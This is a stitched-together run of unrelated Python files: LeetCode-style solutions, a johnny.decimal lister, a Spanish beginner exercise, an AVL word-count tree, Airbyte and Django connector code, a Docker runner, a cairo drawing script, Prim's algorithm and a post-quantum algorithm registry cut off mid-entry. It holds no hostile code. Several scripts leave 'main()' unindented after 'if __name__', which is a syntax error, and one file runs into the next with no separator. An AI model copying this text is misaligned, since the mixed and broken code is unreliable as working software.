reindex_sphinx_docs = marlton.scripts.reindex_sphinx_docs:main
debug_marlton = marlton.scripts.debug:main
"""
)
|
class Solution(object):
    def longestPalindrome(self, s):
        """
        Return the length of the longest palindrome that can be built from
        the characters of ``s`` (case-sensitive).

        :type s: str
        :rtype: int
        """
        # Local import: the original referenced ``collections`` without
        # importing it anywhere in this file, raising NameError at call time.
        from collections import Counter
        # Each character with an odd count contributes one unusable letter,
        # but a single odd letter may sit in the middle of the palindrome.
        odds = sum(count & 1 for count in Counter(s).values())
        return len(s) - odds + int(odds > 0)
|
#!/usr/bin/env python3
import glob
import json
import os
import subprocess
import sys
from typing import Dict, List
def ls(wd: str) -> List[str]:
    """Returns a list of directories under ``wd`` that match the johnny.decimal
    pattern. The paths returned are relative to the passed working directory.

    Rewritten to use :mod:`glob` directly instead of shelling out to
    ``ls -1d`` via ``/bin/sh`` (no subprocess, no backslash-escaping of the
    space in the category segment). Results are sorted to keep the stable,
    alphabetical ordering ``ls`` produced.
    """
    # <area>/<category>/<id>, e.g. "10-19 Area/11 Category/11.01 Item"
    pattern = "[0-9][0-9]-*/[0-9][0-9] */[0-9][0-9].[0-9][0-9]*"
    prefix = os.path.join(wd, "")  # wd plus a trailing separator
    matches = glob.glob(os.path.join(wd, pattern))
    return sorted(match[len(prefix):] for match in matches)
def item(relpath: str, wd: str) -> Dict:
    """Build one search-filter result entry for *relpath* under *wd*."""
    full_path = os.path.join(wd, relpath)
    entry = {
        "type": "file",
        "title": os.path.basename(relpath),
        "subtitle": relpath,
        "arg": full_path,
    }
    # The icon is derived from the file itself ("fileicon" type).
    entry["icon"] = {"type": "fileicon", "path": full_path}
    return entry
def main():
    """Resolve the working directory (argv, $JOHNNY_ROOT, then cwd) and
    print the matching items as a JSON document on stdout."""
    wd = sys.argv[1] if len(sys.argv) == 2 else None
    if not wd:
        wd = os.getenv("JOHNNY_ROOT") or os.getcwd()
    wd = os.path.expanduser(wd)
    items = [item(rel, wd) for rel in ls(wd)]
    print(json.dumps({"items": items}))
if __name__ == "__main__":
main()
|
from datetime import date
def edad(fn):
    """Return completed years of age for a birth date given as 'dd-mm-yyyy'."""
    dia, mes, anio = (int(parte) for parte in fn.split('-'))
    hoy = date.today()
    anios = hoy.year - anio
    # Not yet had the birthday this year? Tuple comparison covers both the
    # "later month" and "same month, later day" cases.
    if (mes, dia) > (hoy.month, hoy.day):
        anios -= 1
    return anios
def separeNameFormalName(fullNames):
    """Split 'Last, First' strings into formal names ('F. Last') and first names."""
    formalNames = []
    names = []
    for fullName in fullNames:
        partes = fullName.split(', ')
        apellido, nombre = partes[0], partes[1]
        formalNames.append(nombre[0] + '. ' + apellido)
        names.append(nombre)
    return formalNames, names
def nameMoreLonger(names):
    """Return the first longest name in *names*.

    Rewritten with ``max(key=len)``: for ties it keeps the earliest element,
    exactly like the original strict ``>`` comparison. The original raised
    UnboundLocalError on an empty list; ``max`` now raises ValueError, the
    conventional signal for an empty sequence.
    """
    return max(names, key=len)
def averageWomanAge(datesOfBitrh, generes):
    """Return the truncated mean age of entries whose gender marker is 'f'.

    BUG FIX: the body previously read the module-level global
    ``datesOfBirth`` instead of its parameter (which worked only by
    accident). The parameter keeps its original, misspelled name so any
    keyword callers remain compatible.

    Raises ZeroDivisionError when no entry is 'f' (unchanged behaviour).
    """
    total = 0
    divisor = 0
    for i in range(len(generes)):
        if generes[i] == 'f':
            total += edad(datesOfBitrh[i])  # now uses the parameter
            divisor += 1
    return int(total / divisor)
# Data: full names ('Last, First'), gender markers ('f'/'m') and birth dates.
fullNames = ['Torres, Ana', 'Hudson, Kate', 'Quesada, Benicio', 'Campoamores, Susana',
             'Santamaría, Carlos', 'Skarsgard, Azul', 'Catalejos, Walter']
generes = ['f', 'f', 'm', 'f', 'm', 'f', 'm']
datesOfBirth = ['02/05/1943', '07/09/1984', '10/02/1971',
                '21/12/1967', '30/01/1982', '30/08/1995', '18/07/1959']
# Exercise 1: print each name in formal form ('F. Last').
formalNames, names = separeNameFormalName(fullNames)
for formalName in formalNames:
    print(formalName)
# Exercise 2: the longest first name.
print('El nombre más largo es:', nameMoreLonger(names))
# Exercise 3: average age of the women. edad() expects 'dd-mm-yyyy',
# so normalise the separators first.
for i in range(len(datesOfBirth)):
    datesOfBirth[i] = datesOfBirth[i].replace('/', '-')
print('El promedio de edad de las mujeres es:',
      averageWomanAge(datesOfBirth, generes))
|
__author__ = 'Netšajev'
class BinarySearchTree:
    """Self-balancing (AVL) binary search tree of words with occurrence counts.

    Inserting a word that is already present increments its counter instead
    of adding a node; structural inserts trigger AVL rebalancing.
    """
    def __init__(self):
        # Empty tree until the first put().
        self.root = None
    def __iter__(self):
        # In-order traversal of TreeNode objects, delegated to the root.
        # NOTE(review): raises AttributeError on an empty tree -- confirm
        # callers always put() at least one word before iterating.
        return self.root.__iter__()
    def max_depth(self):
        """Return the depth of the deepest leaf (the root is at depth 1)."""
        temp_depth = 0
        for node in self.root.__iter__():
            # TreeNode.get_depth() returns 0 for inner nodes, so only leaves count.
            temp_depth = max(node.get_depth(), temp_depth)
        return temp_depth
    def min_value(self):
        """
        Returns the left-most node, not the
        node with the lowest counter value
        """
        current_node = self.root
        if current_node:
            while current_node.has_left_child():
                current_node = current_node.left_child
            return current_node
        else:
            return None
    def print_tree(self, node, words=None):
        """Collect (word, count) pairs of the subtree at ``node`` in order.

        The outermost call prints the collected list before returning it;
        returns None when ``node`` is None.
        """
        if node is None:
            return
        # Short way with Node __iter__: print(list(node.__iter__()))
        flag_start = False
        if words is None:
            # Only the outermost call owns (and finally prints) the list.
            flag_start = True
            words = []
        if node.has_left_child():
            self.print_tree(node.left_child, words)
        words.append((node.word, node.count))
        if node.has_right_child():
            self.print_tree(node.right_child, words)
        if flag_start:
            print(words)
        return words
    def search(self, word):
        """Return the node holding ``word``; print a notice and return None if absent."""
        current_node = self.root
        while current_node:
            if word == current_node.word:
                return current_node
            elif word > current_node.word:
                current_node = current_node.right_child
            elif word < current_node.word:
                current_node = current_node.left_child
            else:
                # Unreachable: ==, > and < cover all string comparisons.
                break
        print("Word {} was not found in the tree".format(word))
        return None
    def put(self, word):
        """Insert ``word``, or bump its count if it is already present."""
        if self.root:
            self._put(word, self.root)
        else:
            self.root = TreeNode(word)
    def _put(self, word, current_node):
        # Standard BST descent; a newly created leaf triggers AVL bookkeeping.
        if word < current_node.word:
            if current_node.has_left_child():
                self._put(word, current_node.left_child)
            else:
                current_node.left_child = TreeNode(word, parent=current_node)
                self.update_balance(current_node.left_child)
        elif word > current_node.word:
            if current_node.has_right_child():
                self._put(word, current_node.right_child)
            else:
                current_node.right_child = TreeNode(word, parent=current_node)
                self.update_balance(current_node.right_child)
        else:
            # Equal word: no structural change, just count it again.
            current_node.increase_word_count()
    def update_balance(self, node):
        """Propagate a new node's height effect on balance factors up the tree."""
        if node.balance_factor > 1 or node.balance_factor < -1:
            self.rebalance(node)
            return
        if node.parent is not None:
            # Convention: growth of a left subtree increases the factor,
            # growth of a right subtree decreases it.
            if node.is_left_child():
                node.parent.balance_factor += 1
            elif node.is_right_child():
                node.parent.balance_factor -= 1
            if node.parent.balance_factor != 0:
                # The parent's subtree height changed; keep walking rootward.
                self.update_balance(node.parent)
    def rotate_left(self, old_root):
        """Left-rotate the subtree rooted at ``old_root``."""
        new_root = old_root.right_child
        old_root.right_child = new_root.left_child
        if new_root.left_child is not None:
            new_root.left_child.parent = old_root
        new_root.parent = old_root.parent
        if old_root.is_root():
            self.root = new_root
        else:
            if old_root.is_left_child():
                old_root.parent.left_child = new_root
            else:
                old_root.parent.right_child = new_root
        new_root.left_child = old_root
        old_root.parent = new_root
        # Balance-factor update per the standard AVL rotation derivation;
        # old_root must be updated first because new_root's formula uses it.
        old_root.balance_factor = old_root.balance_factor + 1 - min(new_root.balance_factor, 0)
        new_root.balance_factor = new_root.balance_factor + 1 + max(old_root.balance_factor, 0)
    def rotate_right(self, old_root):
        """Right-rotate the subtree rooted at ``old_root`` (mirror of rotate_left)."""
        new_root = old_root.left_child
        old_root.left_child = new_root.right_child
        if new_root.right_child is not None:
            new_root.right_child.parent = old_root
        new_root.parent = old_root.parent
        if old_root.is_root():
            self.root = new_root
        else:
            if old_root.is_right_child():
                old_root.parent.right_child = new_root
            else:
                old_root.parent.left_child = new_root
        new_root.right_child = old_root
        old_root.parent = new_root
        old_root.balance_factor = old_root.balance_factor - 1 - max(new_root.balance_factor, 0)
        new_root.balance_factor = new_root.balance_factor - 1 + min(old_root.balance_factor, 0)
    def rebalance(self, node):
        """Apply the single or double rotation restoring the AVL invariant at ``node``."""
        if node.balance_factor < 0:
            # Right-heavy; a right-leaning right child needs a double rotation.
            if node.right_child.balance_factor > 0:
                self.rotate_right(node.right_child)
                self.rotate_left(node)
            else:
                self.rotate_left(node)
        elif node.balance_factor > 0:
            # Left-heavy (mirror case).
            if node.left_child.balance_factor < 0:
                self.rotate_left(node.left_child)
                self.rotate_right(node)
            else:
                self.rotate_right(node)
    def get(self, word):
        """Return the count stored for ``word``, or None if it is absent."""
        if self.root:
            res = self._get(word, self.root)
            if res:
                return res.count
            else:
                return None
        else:
            return None
    def _get(self, word, current_node):
        # Recursive lookup returning the TreeNode itself (not the count) or None.
        if not current_node:
            return None
        elif current_node.word == word:
            return current_node
        elif word < current_node.word:
            return self._get(word, current_node.left_child)
        else:
            return self._get(word, current_node.right_child)
    def __getitem__(self, word):
        # tree[word] -> count or None, mirroring get().
        return self.get(word)
    def __contains__(self, word):
        # Membership test: `word in tree`.
        if self._get(word, self.root):
            return True
        else:
            return False
class TreeNode:
    """One AVL tree node: a word, its occurrence count, links and balance factor.

    Note the ``has_*`` predicates return the linked object (or None), relying
    on truthiness; callers use them in boolean context.
    """
    def __init__(self, word, left=None, right=None, parent=None):
        self.word = word
        # Number of times the word has been put() into the tree.
        self.count = 1
        self.left_child = left
        self.right_child = right
        self.parent = parent
        # AVL balance: height(left) - height(right), maintained by the tree.
        self.balance_factor = 0
        # Adopt any children supplied to the constructor.
        if self.has_left_child():
            self.left_child.parent = self
        if self.has_right_child():
            self.right_child.parent = self
    def __iter__(self):
        """Yield the nodes of this subtree in sorted (in-order) sequence."""
        if self:
            if self.has_left_child():
                for elem in self.left_child:
                    yield elem
            yield self
            if self.has_right_child():
                for elem in self.right_child:
                    yield elem
    def get_depth(self):
        """Return this node's depth from the root -- but only for leaves;
        inner nodes return 0 (as relied upon by BinarySearchTree.max_depth)."""
        if self.is_leaf():
            depth = 1
            current_node = self
            while current_node.has_parent():
                depth += 1
                current_node = current_node.parent
            return depth
        return 0
    def get_count(self):
        # Accessor for the occurrence counter.
        return self.count
    def has_parent(self):
        # Truthy TreeNode or None.
        return self.parent
    def has_left_child(self):
        return self.left_child
    def has_right_child(self):
        return self.right_child
    def is_left_child(self):
        return self.parent and self.parent.left_child == self
    def is_right_child(self):
        return self.parent and self.parent.right_child == self
    def is_root(self):
        return not self.parent
    def is_leaf(self):
        return not (self.right_child or self.left_child)
    def has_any_children(self):
        return self.right_child or self.left_child
    def has_both_children(self):
        return self.right_child and self.left_child
    def increase_word_count(self):
        # Called instead of inserting a duplicate node.
        self.count += 1
    def __str__(self):
        # e.g. "('word', 3)"
        return str((self.word, self.count))
def process_file(opened_file):
    """Yield each maximal run of alphabetic characters, lowercased.

    Digits, punctuation and whitespace act as word separators; a word
    spanning the end of the input is still emitted.
    """
    buffered = []
    for line in opened_file:
        for char in line.lower():
            if char.isalpha():
                buffered.append(char)
            elif buffered:
                yield ''.join(buffered)
                buffered = []
    # Flush a trailing word that was not followed by a separator.
    if buffered:
        yield ''.join(buffered)
def main():
    """Build a word-frequency AVL tree from Carcosa.txt and print statistics."""
    filename = "Carcosa.txt"
    words_tree = BinarySearchTree()
    # Use a context manager so the file is closed (the original leaked it).
    with open(filename) as my_file:
        for word in process_file(my_file):
            words_tree.put(word)
    words = [(node.word, node.count) for node in words_tree.__iter__()]
    print(words)
    print(words_tree.min_value())
    print(words_tree.root)
    print(words_tree.search('liberty'))
    words_tree.print_tree(words_tree.search('above'))
    print("\nMaximum depth: {}".format(words_tree.max_depth()))
if __name__ == "__main__":
main() |
#
# Copyright (c) 2023 Airbyte, Inc., all rights reserved.
#
import argparse
import io
import logging
import sys
from abc import ABC, abstractmethod
from typing import Any, Iterable, List, Mapping
from airbyte_cdk.connector import Connector
from airbyte_cdk.exception_handler import init_uncaught_exception_handler
from airbyte_cdk.models import AirbyteMessage, ConfiguredAirbyteCatalog, Type
from airbyte_cdk.sources.utils.schema_helpers import check_config_against_spec_or_exit
from airbyte_cdk.utils.traced_exception import AirbyteTracedException
from pydantic import ValidationError
logger = logging.getLogger("airbyte")
class Destination(Connector, ABC):
    """Base class for Airbyte destination connectors.

    Subclasses implement :meth:`write`; this class supplies the CLI entry
    point (``spec`` / ``check`` / ``write``) and stdin message parsing.
    """
    VALID_CMDS = {"spec", "check", "write"}
    @abstractmethod
    def write(
        self, config: Mapping[str, Any], configured_catalog: ConfiguredAirbyteCatalog, input_messages: Iterable[AirbyteMessage]
    ) -> Iterable[AirbyteMessage]:
        """Implement to define how the connector writes data to the destination"""
    def _run_check(self, config: Mapping[str, Any]) -> AirbyteMessage:
        # Delegate to Connector.check and wrap the result for stdout emission.
        check_result = self.check(logger, config)
        return AirbyteMessage(type=Type.CONNECTION_STATUS, connectionStatus=check_result)
    def _parse_input_stream(self, input_stream: io.TextIOWrapper) -> Iterable[AirbyteMessage]:
        """Reads from stdin, converting to Airbyte messages"""
        for line in input_stream:
            try:
                yield AirbyteMessage.parse_raw(line)
            except ValidationError:
                # Non-message lines (e.g. stray logs) are skipped, not fatal.
                logger.info(f"ignoring input which can't be deserialized as Airbyte Message: {line}")
    def _run_write(
        self, config: Mapping[str, Any], configured_catalog_path: str, input_stream: io.TextIOWrapper
    ) -> Iterable[AirbyteMessage]:
        """Stream stdin records through the subclass write() implementation."""
        catalog = ConfiguredAirbyteCatalog.parse_file(configured_catalog_path)
        input_messages = self._parse_input_stream(input_stream)
        logger.info("Begin writing to the destination...")
        yield from self.write(config=config, configured_catalog=catalog, input_messages=input_messages)
        logger.info("Writing complete.")
    def parse_args(self, args: List[str]) -> argparse.Namespace:
        """
        :param args: commandline arguments
        :return: parsed namespace with ``command`` plus per-command options
        """
        parent_parser = argparse.ArgumentParser(add_help=False)
        main_parser = argparse.ArgumentParser()
        subparsers = main_parser.add_subparsers(title="commands", dest="command")
        # spec
        subparsers.add_parser("spec", help="outputs the json configuration specification", parents=[parent_parser])
        # check
        check_parser = subparsers.add_parser("check", help="checks the config can be used to connect", parents=[parent_parser])
        required_check_parser = check_parser.add_argument_group("required named arguments")
        required_check_parser.add_argument("--config", type=str, required=True, help="path to the json configuration file")
        # write
        write_parser = subparsers.add_parser("write", help="Writes data to the destination", parents=[parent_parser])
        write_required = write_parser.add_argument_group("required named arguments")
        write_required.add_argument("--config", type=str, required=True, help="path to the JSON configuration file")
        write_required.add_argument("--catalog", type=str, required=True, help="path to the configured catalog JSON file")
        parsed_args = main_parser.parse_args(args)
        cmd = parsed_args.command
        if not cmd:
            raise Exception("No command entered. ")
        elif cmd not in self.VALID_CMDS:  # single source of truth for valid commands
            # This is technically dead code since parse_args() would fail if this was the case
            # But it's non-obvious enough to warrant placing it here anyways
            raise Exception(f"Unknown command entered: {cmd}")
        return parsed_args
    def run_cmd(self, parsed_args: argparse.Namespace) -> Iterable[AirbyteMessage]:
        """Dispatch the parsed command, yielding AirbyteMessages for stdout."""
        cmd = parsed_args.command
        if cmd not in self.VALID_CMDS:
            raise Exception(f"Unrecognized command: {cmd}")
        spec = self.spec(logger)
        if cmd == "spec":
            yield AirbyteMessage(type=Type.SPEC, spec=spec)
            return
        config = self.read_config(config_path=parsed_args.config)
        if self.check_config_against_spec or cmd == "check":
            try:
                check_config_against_spec_or_exit(config, spec)
            except AirbyteTracedException as traced_exc:
                connection_status = traced_exc.as_connection_status_message()
                if connection_status and cmd == "check":
                    # BUG FIX: yield the AirbyteMessage itself, not its JSON
                    # string -- run() serializes every yielded message with
                    # .json() and would crash on a plain str.
                    yield connection_status
                    return
                raise traced_exc
        if cmd == "check":
            yield self._run_check(config=config)
        elif cmd == "write":
            # Wrap in UTF-8 to override any other input encodings
            wrapped_stdin = io.TextIOWrapper(sys.stdin.buffer, encoding="utf-8")
            yield from self._run_write(config=config, configured_catalog_path=parsed_args.catalog, input_stream=wrapped_stdin)
    def run(self, args: List[str]):
        """CLI entry point: parse args, execute, print each message as JSON."""
        init_uncaught_exception_handler(logger)
        parsed_args = self.parse_args(args)
        output_messages = self.run_cmd(parsed_args)
        for message in output_messages:
            print(message.json(exclude_unset=True))
|
from django.shortcuts import get_object_or_404
from rest_framework import serializers
from care.facility.models import MedibaseMedicine, MedicineAdministration, Prescription
from care.users.api.serializers.user import UserBaseMinimumSerializer
class MedibaseMedicineSerializer(serializers.ModelSerializer):
    """Read serializer for MedibaseMedicine; exposes ``external_id`` as ``id``."""
    id = serializers.UUIDField(source="external_id", read_only=True)
    class Meta:
        model = MedibaseMedicine
        # Soft-delete flag is internal; never serialized.
        exclude = ("deleted",)
        read_only_fields = (
            "external_id",
            "created_date",
            "modified_date",
        )
class PrescriptionSerializer(serializers.ModelSerializer):
    """Serializer for prescriptions.

    ``medicine`` is written as a UUID and resolved to a MedibaseMedicine in
    validate(); it is read back as the nested ``medicine_object``.
    """
    id = serializers.UUIDField(source="external_id", read_only=True)
    prescribed_by = UserBaseMinimumSerializer(read_only=True)
    last_administered_on = serializers.SerializerMethodField()
    medicine_object = MedibaseMedicineSerializer(read_only=True, source="medicine")
    medicine = serializers.UUIDField(write_only=True)
    def get_last_administered_on(self, obj):
        """Created date of the most recent administration of ``obj``, or None."""
        last_administration = (
            MedicineAdministration.objects.filter(prescription=obj)
            .order_by("-created_date")
            .first()
        )
        if last_administration:
            return last_administration.created_date
        return None
    class Meta:
        model = Prescription
        exclude = (
            "consultation",
            "deleted",
        )
        read_only_fields = (
            "medicine_old",
            "external_id",
            "prescribed_by",
            "created_date",
            "modified_date",
            "discontinued_date",
            "is_migrated",
        )
    def validate(self, attrs):
        """Resolve the medicine UUID and enforce PRN/frequency rules."""
        if "medicine" in attrs:
            # Responds 404 (not a validation error) when the UUID is unknown.
            attrs["medicine"] = get_object_or_404(
                MedibaseMedicine, external_id=attrs["medicine"]
            )
        if attrs.get("is_prn"):
            # PRN ("as needed") prescriptions must say when to administer.
            if not attrs.get("indicator"):
                raise serializers.ValidationError(
                    {"indicator": "Indicator should be set for PRN prescriptions."}
                )
        else:
            # Scheduled prescriptions must say how often.
            if not attrs.get("frequency"):
                raise serializers.ValidationError(
                    {"frequency": "Frequency should be set for prescriptions."}
                )
        return super().validate(attrs)
    # TODO: Ensure that this medicine is not already prescribed to the same patient and is currently active.
class MedicineAdministrationSerializer(serializers.ModelSerializer):
    """Serializer for administrations; the linked prescription is read-only."""
    id = serializers.UUIDField(source="external_id", read_only=True)
    administered_by = UserBaseMinimumSerializer(read_only=True)
    prescription = PrescriptionSerializer(read_only=True)
    class Meta:
        model = MedicineAdministration
        exclude = ("deleted",)
        read_only_fields = (
            "external_id",
            "administered_by",
            "created_date",
            "modified_date",
            "prescription",
        )
|
import os
import docker
import time
def handle_container(file_name):
    """Run *file_name* inside a 'broncode_r' docker container, return its log.

    Improvements over the original: the status-polling loops sleep between
    reloads instead of busy-spinning at 100% CPU, and the ``docker cp``
    shell-out uses an argument list (robust to spaces in *file_name*)
    instead of an ``os.system`` string concatenation.
    """
    import subprocess
    client = docker.from_env()
    # Create container detached so we can copy the source file in first.
    container = client.containers.run('broncode_r', detach=True)
    # Wait until the container leaves the "created" state.
    while "created" in container.status:
        time.sleep(0.1)
        container.reload()
    # TODO: get docker-py to do this (put_archive); shelling out for now.
    subprocess.run(["docker", "cp", file_name, container.id + ":/"])
    # Wait until the container has exited.
    while "running" in container.status:
        time.sleep(0.1)
        container.reload()
    return container.logs().decode("utf-8")
def write_code_file(file_name):
    """Write the sample 'Hello World' R script to *file_name*.

    Uses a context manager so the handle is flushed and closed (the
    original left the file object open).
    """
    code = "hello <- \"Hello World!\" \n" \
           "print(hello) \n"
    with open(file_name, "w") as out_file:
        out_file.write(code)
def run_time_trial(file_name="code.r", reps=20):
    """Print the average wall-clock time of handle_container() over *reps* runs.

    BUG FIX: the original called ``handle_container()`` with no argument,
    which raised TypeError since that function requires a file name. The
    name (and repetition count) are now defaulted parameters, so existing
    zero-argument callers keep working.
    """
    start_time = time.time()
    for _ in range(reps):
        handle_container(file_name)
    elapsed_time = time.time() - start_time
    elap = str(elapsed_time / reps)
    print("Average time to run container is " + elap + " sec\n")
def main():
    """Write the sample R script, run it in a container, print the log."""
    #TODO: consider logging inputs and outputs
    script_name = "code.r"
    write_code_file(script_name)
    print(handle_container(script_name))
#TODO: clean up code.py
if __name__ == "__main__":
main()
|
def i_am_this_old(age):
    """Print a sentence stating *age*."""
    message = 'I am ' + str(age) + ' old'
    print(message)
# Demonstrate the function call, then exercise the if/elif/else branches.
my_age = 24
i_am_this_old(my_age)
if my_age > 23:
    print("not real")
elif my_age == 24:
    print("that's not real")
else:
    print("you are fake news")
print("done")
# Build a list of ten 'a' characters. (Removed the unused, misspelled
# loop variable 'nubmer' by switching to a comprehension.)
a_list = ['a' for _ in range(10)]
|
# lets draw some stuff with ciaro!
from math import pi
import cairo
def to_cairo(pos, num_strings=6):
    """Render a guitar-chord style diagram to 'pic.png'.

    pos -- iterable of (string_index, fret_index) dots to draw
    num_strings -- number of vertical string lines (default 6)
    """
    width, height = 300, 400
    # Drawing happens in normalised units: after cr.scale(width, width) one
    # unit equals the image width, so h compensates for the aspect ratio.
    w, h = 0.6, 0.8*height/width
    surface = cairo.ImageSurface(cairo.Format.ARGB32, width, height)
    cr = cairo.Context(surface)
    # Put the origin at the image centre.
    cr.translate(width/2, height/2)
    cr.scale(width, width)
    cr.set_source_rgba(1.0, 1.0, 1.0, 1.0)
    # fill bg
    cr.paint()
    cr.set_source_rgba(0.0, 0.0, 0.0, 1.0)
    # draw strings (evenly spaced vertical lines)
    n = num_strings - 1
    string = [-w/2 + w/n*i for i in range(num_strings)]
    for x in string:
        cr.move_to(x, +h/2)
        cr.line_to(x, -h/2)
    # draw frets (horizontal lines); dot y-positions sit halfway between them
    n = 5
    fret = []
    for i in range(n + 1):
        cr.move_to(-w/2, +h/2 - h/n*i)
        cr.line_to(+w/2, +h/2 - h/n*i)
        fret.append(-h/2 + h/n*(i - 0.5))
    cr.set_line_width(0.01)
    cr.set_line_cap(cairo.LineCap.SQUARE)
    cr.stroke()
    # draw positions as filled circles
    r = 0.05
    for p in pos:
        x = string[p[0]]
        y = fret[p[1]]
        cr.arc(x, y, r, 0.0, 2.0*pi)
        cr.fill()
    surface.write_to_png('pic.png')
def main():
    """Draw a fixed example of three dots to pic.png."""
    positions = [(0, 1), (1, 2), (3, 4)]
    to_cairo(positions)
if __name__ == '__main__':
main()
|
from functools import reduce
from math import inf as Infinity
import pprint
pp = pprint.PrettyPrinter(indent=1)
def prim(graph):
    """Return the total weight of a minimum spanning tree of ``graph``.

    graph -- dict with key 'vertices': a 1-indexed list of adjacency lists
             (index 0 is None); each adjacency entry is (other_vertex, weight).

    Uses the naive O(V * E) Prim scan: repeatedly pick the cheapest edge
    leaving the current tree. The reduce()-based folds of the original are
    replaced with the clearer all() / sum() builtins (same results).
    """
    gv = graph['vertices']
    ## MST: adjacency lists of vertices currently in the tree (None at index 0)
    ## MSTedges: edges chosen so far, as (from_vertex, to_vertex, weight)
    ## MSTfilled[i]: True when vertex i is already in the tree
    MST = [None, gv[1]] + [[] for _ in range(2, len(gv))]
    MSTedges = []
    MSTfilled = [False, True] + [False] * (len(gv) - 2)
    # Grow the tree until every vertex is covered.
    while not all(MSTfilled[1:]):
        # Start with infinite cost so any real edge beats it.
        cheapestEdge = (None, None, Infinity)
        for i in range(1, len(MST)):
            for edge in MST[i]:
                # Candidate iff cheaper than the best so far AND it leads
                # to a vertex not yet in the tree.
                if edge[1] < cheapestEdge[2] and not MSTfilled[edge[0]]:
                    cheapestEdge = (i, edge[0], edge[1])
        MSTedges.append(cheapestEdge)
        MST[cheapestEdge[1]] = gv[cheapestEdge[1]]  # expose the new vertex's edges
        MSTfilled[cheapestEdge[1]] = True
    return sum(edge[2] for edge in MSTedges)
def get_graph_from_file(filename):
    """Parse a graph file into {'vertices': adjacency lists, 'edges': tuples}.

    File format: a header line whose first field is the vertex count, then
    one "start end weight" line per edge. Vertices are 1-indexed (index 0
    holds None); each undirected edge is recorded in both endpoints' lists
    as (other_vertex, weight) and in 'edges' as (start, end, weight).
    """
    # Read through a context manager; the original list(open(...)) leaked
    # the file handle.
    with open(filename) as f:
        inputList = list(f)
    vertices, edges = [None], []
    num_vertices = int(inputList[0].rstrip('\n').split(' ')[0])
    for _ in range(num_vertices):
        vertices.append([])
    for rawStr in inputList[1:]:
        startVertex, endVertex, weight = map(int, rawStr.rstrip('\n').split(' '))
        edges.append((startVertex, endVertex, weight))
        vertices[startVertex].append((endVertex, weight))
        vertices[endVertex].append((startVertex, weight))
    return {'vertices': vertices, 'edges': edges}
##graph = [[{'endVertex': 2, 'weight': 1}, {'endVertex': 8, 'weight': 2}], [{'endVertex': 1, 'weight': 1}, {'endVertex': 3, 'weight': 1}], [{'endVertex': 2, 'weight': 1}, {'endVertex': 4, 'weight': 1}], [{'endVertex': 3, 'weight': 1}, {'endVertex': 5, 'weight': 1}], [{'endVertex': 4, 'weight': 1}, {'endVertex': 6, 'weight': 1}], [{'endVertex': 5, 'weight': 1}, {'endVertex': 7, 'weight': 1}], [{'endVertex': 6, 'weight': 1}, {'endVertex': 8, 'weight': 1}], [{'endVertex': 7, 'weight': 1}, {'endVertex': 1, 'weight': 2}]]
# Load the sample data set ("<n> <m>" header, then "start end weight" lines)
# and print the total MST weight.
graph = get_graph_from_file('data/primData.txt')
print(prim(graph))
|
# Read an integer and report primality as the strings "True" / "False".
number = int(input())
# BUG FIX: the original counted every divisor in [1, n) and tested
# `count > 2`. Since 1 divides everything, that wrongly reported 1 and the
# squares of primes (4, 9, 25, ...) as prime. Test divisors >= 2 instead.
is_prime = number > 1 and all(number % i != 0 for i in range(2, number))
if is_prime:
    print("True")
else:
    print("False")
# Registry of supported post-quantum algorithms.
# Keys are the Python-level identifiers; each value holds:
#   path              -- name/directory of the upstream implementation
#   is_kem / is_sign  -- key-encapsulation mechanism vs. signature scheme
#   *_in_threadpool   -- run that (slow) operation in a thread pool
ALGORITHMS = {
    # --- Key-encapsulation mechanisms (KEMs) ---
    "firesaber": {"path": "firesaber", "is_kem": True},
    "frodokem1344aes": {"path": "frodokem1344aes", "is_kem": True},
    "frodokem1344shake": {"path": "frodokem1344shake", "is_kem": True},
    "frodokem640aes": {"path": "frodokem640aes", "is_kem": True},
    "frodokem640shake": {"path": "frodokem640shake", "is_kem": True},
    "frodokem976aes": {"path": "frodokem976aes", "is_kem": True},
    "frodokem976shake": {"path": "frodokem976shake", "is_kem": True},
    "kyber1024": {"path": "kyber1024", "is_kem": True},
    "kyber1024_90s": {"path": "kyber1024-90s", "is_kem": True},
    "kyber512": {"path": "kyber512", "is_kem": True},
    "kyber512_90s": {"path": "kyber512-90s", "is_kem": True},
    "kyber768": {"path": "kyber768", "is_kem": True},
    "kyber768_90s": {"path": "kyber768-90s", "is_kem": True},
    "lightsaber": {"path": "lightsaber", "is_kem": True},
    # Classic McEliece key generation is slow, hence the thread pool flag.
    "mceliece348864": {"path": "mceliece348864", "is_kem": True, "generate_in_threadpool": True},
    "mceliece348864f": {"path": "mceliece348864f", "is_kem": True, "generate_in_threadpool": True},
    "mceliece460896": {"path": "mceliece460896", "is_kem": True, "generate_in_threadpool": True},
    "mceliece460896f": {"path": "mceliece460896f", "is_kem": True, "generate_in_threadpool": True},
    "mceliece6688128": {"path": "mceliece6688128", "is_kem": True, "generate_in_threadpool": True},
    "mceliece6688128f": {"path": "mceliece6688128f", "is_kem": True, "generate_in_threadpool": True},
    "mceliece6960119": {"path": "mceliece6960119", "is_kem": True, "generate_in_threadpool": True},
    "mceliece6960119f": {"path": "mceliece6960119f", "is_kem": True, "generate_in_threadpool": True},
    "mceliece8192128": {"path": "mceliece8192128", "is_kem": True, "generate_in_threadpool": True},
    "mceliece8192128f": {"path": "mceliece8192128f", "is_kem": True, "generate_in_threadpool": True},
    "ntruhps2048509": {"path": "ntruhps2048509", "is_kem": True},
    "ntruhps2048677": {"path": "ntruhps2048677", "is_kem": True},
    "ntruhps4096821": {"path": "ntruhps4096821", "is_kem": True},
    "ntruhrss701": {"path": "ntruhrss701", "is_kem": True},
    "saber": {"path": "saber", "is_kem": True},
    # --- Signature schemes ---
    "dilithium2": {"path": "dilithium2", "is_sign": True},
    "dilithium3": {"path": "dilithium3", "is_sign": True},
    "dilithium4": {"path": "dilithium4", "is_sign": True},
    "falcon_1024": {"path": "falcon-1024", "is_sign": True},
    "falcon_512": {"path": "falcon-512", "is_sign": True},
    # Rainbow variants are slow for every operation, hence all three flags.
    "rainbowIa_classic": {
        "path": "rainbowIa-classic",
        "is_sign": True,
        "generate_in_threadpool": True,
        "sign_in_threadpool": True,
        "verify_in_threadpool": True,
    },
    "rainbowIa_cyclic": {
        "path": "rainbowIa-cyclic",
        "is_sign": True,
        "generate_in_threadpool": True,
        "sign_in_threadpool": True,
        "verify_in_threadpool": True,
    },
    "rainbowIa_cyclic_compressed": {
        "path": "rainbowIa-cyclic-compressed",
        "is_sign": True,
        "generate_in_threadpool": True,
        "sign_in_threadpool": True,
        "verify_in_threadpool": True,
    },
    "rainbowIIIc_classic": {
        "path": "rainbowIIIc-classic",
        "is_sign": True,
        "generate_in_threadpool": True,
